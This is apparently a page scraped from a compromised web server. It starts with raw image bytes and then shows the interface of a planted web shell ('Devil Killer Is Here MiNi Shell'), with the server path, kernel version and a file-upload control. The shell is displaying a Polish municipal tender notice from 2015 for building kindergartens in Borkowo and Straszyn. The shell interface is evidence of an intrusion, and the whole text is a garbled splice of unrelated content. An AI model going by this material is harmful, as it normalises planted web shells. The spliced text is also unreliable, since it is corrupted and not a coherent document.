JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151030/292178-N-2015.html

<p class="kh_header"><b>Pruszcz Gdański: ZADANIE NR 1 - BUDOWA PRZEDSZKOLA W BORKOWIE 
ZADANIE NR 2 - BUDOWA PRZEDSZKOLA W STRASZYNIE</b><br>
<b>Numer ogłoszenia: 292178 - 2015; data zamieszczenia: 30.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pruszcz Gdański , ul. Wojska Polskiego 30, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 0-58 692 94 21, 692 94 00, faks 0-58 682 27 14.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pruszczgdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZADANIE NR 1 - BUDOWA PRZEDSZKOLA W BORKOWIE 
ZADANIE NR 2 - BUDOWA PRZEDSZKOLA W STRASZYNIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych z podziałem na zadania:
Zadanie nr 1 -  budowa 4-oddziałowego przedszkola  w Borkowie przy ul. Akacjowej, Gmina Pruszcz Gd. 
Zadanie nr 2 - budowa 8-oddziałowego przedszkola w Straszynie przy ul. Pocztowej, Gmina Pruszcz Gd.
2.	Przedmiot zamówienia jest realizowany w trybie /zaprojektuj i wybuduj/.
3.	Szczegółowy zakres przedmiotu zamówienia określony został: 
dla zadania nr 1 - w opisie przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ oraz  /Programie funkcjonalno - użytkowym na  budowę przedszkola w Borkowie przy ul. Akacjowej 2, Gmina Pruszcz Gd./, stanowiącym załącznik nr 2 do SIWZ,
dla zadania nr 2 - w opisie przedmiotu zamówienia stanowiącym załącznik nr 1a do SIWZ oraz  /Programie funkcjonalno - użytkowym na  budowę przedszkola w Straszynie przy ul. Pocztowej, Gmina Pruszcz Gd./, stanowiącym załącznik nr 2a do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 45.20.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium:
dla zadania nr 1  - w wysokości 40 000,00 zł (słownie: czterdzieści tysięcy złotych),
dla zadania nr 2 - w wysokości 60 000,00 zł (słownie: sześćdziesiąt tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie prac projektowych:
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie wykonał (zakończył), co najmniej dwa zamówienia obejmujące wykonanie dokumentacji projektowej budynku użyteczności publicznej;
w zakresie robót budowlanych: 
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty budowlane (potwierdzone dowodami, że roboty te zostały wykonane w sposób należyty oraz wskazującymi że wykonane zostały zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone), z których każda polegała na budowie budynku użyteczności publicznej lub przebudowie budynku użyteczności publicznej.
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty budowlane z których każda polegała na budowie budynku użyteczności publicznej w systemie /zaprojektuj i wybuduj/.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie prac projektowych:
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone tj. osobą posiadającą uprawnienia projektowe określone przepisami Prawa Budowlanego w specjalności konstrukcyjno - budowlanej bez ograniczeń;
w zakresie robót budowlanych: 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone tj.:
- osobą, która pełnić będzie funkcję kierownika budowy, posiadającą uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń,
- osobą, która pełnić będzie funkcję kierownika robót, posiadającą uprawnienia budowlane w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń,
- osobą, która pełnić będzie funkcję kierownika robót, posiadającą uprawnienia budowlane w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.
Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.
Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (Dz.U. z 2010 r. nr 243, poz. 1623) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r., Nr 63, poz. 394).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony druk Formularz oferty, zawierający oświadczenie, że Wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych, a także informację, czy Wykonawca należy lub nie należy do grupy kapitałowej, stanowiący załącznik nr 3 do niniejszej specyfikacji.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres udzielonej rękojmi - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków jej wprowadzenia:
1)	Zmiana terminu realizacji prac określonych w §2 ust.2 umowy:
a)	Spowodowana wydłużającymi się terminami wydania stosownych decyzji, pozwoleń, uzgodnień poza wynikające z obowiązującego prawa (zmiana ta nie dotyczy sytuacji, w której Wykonawca złoży za późno wniosek o wydanie decyzji, uzgodnień itp. lub gdy wniosek ten był niekompletny),
b)	Wykonawca o zaistnieniu okoliczności wymienionych w pkt. 1 lit. a jest zobowiązany niezwłocznie powiadomić Zamawiającego
2)	Termin wykonania umowy, określony w § 2 ust. 4 umowy może ulec zmianie z powodu opóźnień wynikających z:
a)	powodu wydłużających się terminów wydania stosownych decyzji, pozwoleń, uzgodnień poza wynikające z obowiązującego prawa (zmiana ta nie dotyczy sytuacji, w której Wykonawca złoży za późno wniosek o wydanie decyzji, uzgodnień itp. lub gdy wniosek ten był niekompletny),
b)	zmian spowodowanych warunkami atmosferycznymi: klęski żywiołowe, warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót, przeprowadzanie prób, sprawdzeń, dokonywanie odbiorów, 
c)	zmian spowodowanych nieprzewidzianymi w siwz warunkami geologicznymi, archeologicznymi lub terenowymi,
d)	zmian będących następstwem okoliczności leżących po stronie Zamawiającego: wstrzymanie robót przez Zamawiającego, konieczność wprowadzenia zmian w dokumentacji projektowej, 
e)	zmian będących następstwem działania innych podmiotów lub organów np. eksploatatorów infrastruktury,
f)	podpisania umowy na zamówienie dodatkowe, o ile wykonanie tego zamówienia wpływa na termin wykonania niniejszej umowy,
g)	innych niezależnych od Wykonawcy i Zamawiającego okoliczności, wskutek których niemożliwe będzie ukończenie zamówienia w terminie umownym i których nie można było przewidzieć nawet przy zachowaniu należytej staranności.
3)	Okoliczności powodujące opóźnienia, o których mowa w pkt. 2 lit. b-g muszą być odnotowane w Dzienniku Budowy oraz udokumentowane stosownymi protokołami podpisanymi przez kierownika budowy. Po zatwierdzeniu ich przez Zamawiającego ustala się nowe terminy wykonania umowy, z tym że maksymalny okres przesunięcia terminu wykonania umowy nie może być dłuży niż okres przerwy lub przestoju.
4)	Zmiana kadry osobowej Wykonawcy wskazanej w ofercie do wykonania zamówienia jest możliwa pod warunkiem zaproponowania innych osób spełniających pierwotne warunki SIWZ. W szczególności konieczności zmian kadry osobowej Wykonawcy wymaga sytuacja, gdy Zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca zobowiązany jest dokonać zmiany tych osób w terminie nie dłuższym niż 7 dni od daty złożenia wniosku Zamawiającego. 
5)	Zmiana podmiotu, o którym mowa w art. 26 ust. 2b ustawy Prawo zamówień publicznych jest możliwa pod warunkiem zaproponowania nowego podmiotu, spełniającego pierwotne warunki  określone w SIWZ. 
6)	Wykonawca w trakcie wykonywania umowy może powierzyć wykonanie części robót budowlanych Podwykonawcom, mimo niewskazania w ofercie takiej części do powierzenia Podwykonawcom, wskazać inny zakres Podwykonawstwa niż przedstawiony w ofercie, zrezygnować z Podwykonawstwa, zmienić Podwykonawcę.
7)	Wystąpienia zmian powszechnie obowiązujących przepisów prawa podatkowego w zakresie stawki podatku VAT, co skutkować będzie zmianą wynagrodzenia brutto, przy niezmienionym wynagrodzeniu netto.
8)	Dopuszcza się możliwość wystąpienia robót zamiennych w stosunku do przewidzianych dokumentacją projektową oraz SIWZ w sytuacji, gdy wykonanie tych robót będzie niezbędne do prawidłowego (zgodnego z zasadami wiedzy technicznej i obowiązującego prawa) wykonania przedmiotu umowy i jego dalszej eksploatacji. Zmiana taka nie może spowodować zmiany wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pruszczgdanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pruszcz Gdański ul. Wojska Polskiego 30, 83-000 Pruszcz Gdański - pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2015 godzina 11:00, miejsce: Urząd Gminy Pruszcz Gdański ul. Wojska Polskiego 30, 83-000 Pruszcz Gdański - biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> budowa 4-oddziałowego przedszkola  w Borkowie przy ul. Akacjowej, Gmina Pruszcz Gd..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  budowa przedszkola 4-oddziałowego  /pod klucz/, w tym : opracowanie kompleksowej dokumentacji projektowej, uzyskanie pozwolenia na budowę i wykonanie budynku wraz z wyposażeniem w zakresie budowy, uzbrojeniem i zagospodarowaniem terenu w Borkowie przy ul. Akacjowej, Gm. Pruszczu Gdańskim, 
Inwestycję zaplanowano w Borkowie na działce nr 93/6 o pow. 1,09ha, która wraz z działką 92/4 o powierzchni 0,63ha, zabudowana jest istniejącym Zespołem Szkolno-Przedszkolnym i  obie działki stanowią własność Gminy Pruszcz  Gdański.
Obszar planowany na lokalizację przedszkola określony został w załączniku nr 9 do SIWZ - plan (szkic) sytuacyjny lokalizacji inwestycji.

I ETAP
Wykonać wielobranżową dokumentacje techniczną  i uzyskać pozwolenie na budowę dla obiektu pn.  /Budowa przedszkola 4-oddziałowego w Borkowie przy ul. Akacjowej 2  - Inwestor Gmina Pruszcz Gdański/.
Szczegółowy zakres opracowania do części projektowej  przedmiotu  zamówienia wg. wymagań załączonego programu funkcjonalno-użytkowego : 
1.	Wykonać koncepcję architektoniczną ( 2 egz.) budynku przedszkola  wg. wymagań  programu funkcjonalno-użytkowego wraz z  zagospodarowaniem działki w obrębie obiektu oraz  uzyskanie akceptacji  Inwestora.
